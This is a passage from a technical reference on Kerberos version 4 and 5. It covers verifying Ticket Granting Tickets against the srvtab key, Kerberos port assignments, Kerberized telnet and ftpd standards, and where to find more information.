The solution to this problem is for login to verify the Ticket Granting Ticket by using it toacquire a service ticket with a known key and comparing the results. Typically, this meansrequesting an rcmd.<hostname> ticket, where <hostname> is the local host name, and checkingthe response against the key stored in the machine’s /etc/srvtab file. If the keys match, theoriginal Ticket Granting Ticket must have come from Kerberos, because the key only exists inthe srvtab and the Kerberos database, and login can permit the user to log in.

The solution works only as long as the host has a srvtab containing an rcmd.<hostname>,or any other standard principal entry. This is fine for physically secure or single-user work-stations, but does not work on public workstations in which anyone could access the srvtabfile.

Kerberos Port NumbersThe file src/prototypes/services.append in the MIT Kerberos distribution contains the com-monly used port assignments. This file is not the whole story, however. Kerberos has officially

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been moved to port 88, although people will have to listen on port 750 for some time to comeand assume that many servers won’t be converted to listen to port 88 for some time.

“kerberos_master” and “krb_prop” have not been reserved, but they are used only for intra-sitetransactions, so having them reserved probably isn’t necessary. Furthermore, both of their portnumbers have already been assigned to other services, so requesting an official assignmentforces them to change.

eklogin, kpop, and erlogin have not been officially reserved, but probably should be. Theirports currently aren’t assigned to other services, so hopefully they will not have to change if anofficial assignment is requested.

Kerberos TelnetAn experimental Telnet Authentication Option has been defined, and is described inRFC1416. A separate document, RFC1411, describes how that option is to be used withKerberos version 4, but no RFC exists for its use with Kerberos version 5. These RFCs defineonly how authentication must be performed. The standard for full encryption remainsunder development.

An implementation of Kerberos version 4 telnet is available through anonymous FTP from thefollowing site:

It predates both of the earlier-mentioned RFCs, however, and therefore almost certainly isn’tcompliant with them. A Kerberos version 5 telnet implementation, based on the 4.4BSDtelnet/telnetd, also exists, but has been temporarily removed from distribution—probablybecause it also does not comply with the proposed standards.

Kerberos ftpdThe IETF Common Authentication Technology (CAT) Working Group has published theInternet Draft “FTP Security Extensions” <draft-ietf-cat-ftpsec-05.txt>, which definesKerberos version 4 and GSS-API authentication systems. Source code for a Kerberos version 4ftp/ftpd with the extensions is available through anonymous FTP from this site:

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Other Sources of InformationPlenty of Kerberos-related sources are available on the Internet.

The WWW offers much useful information, but it changes frequently enough that listing siteshere would be pointless. The common search engines all list several sites, and most of the sitespoint to other useful sites.

The main newsgroup is comp.protocols.kerberos.

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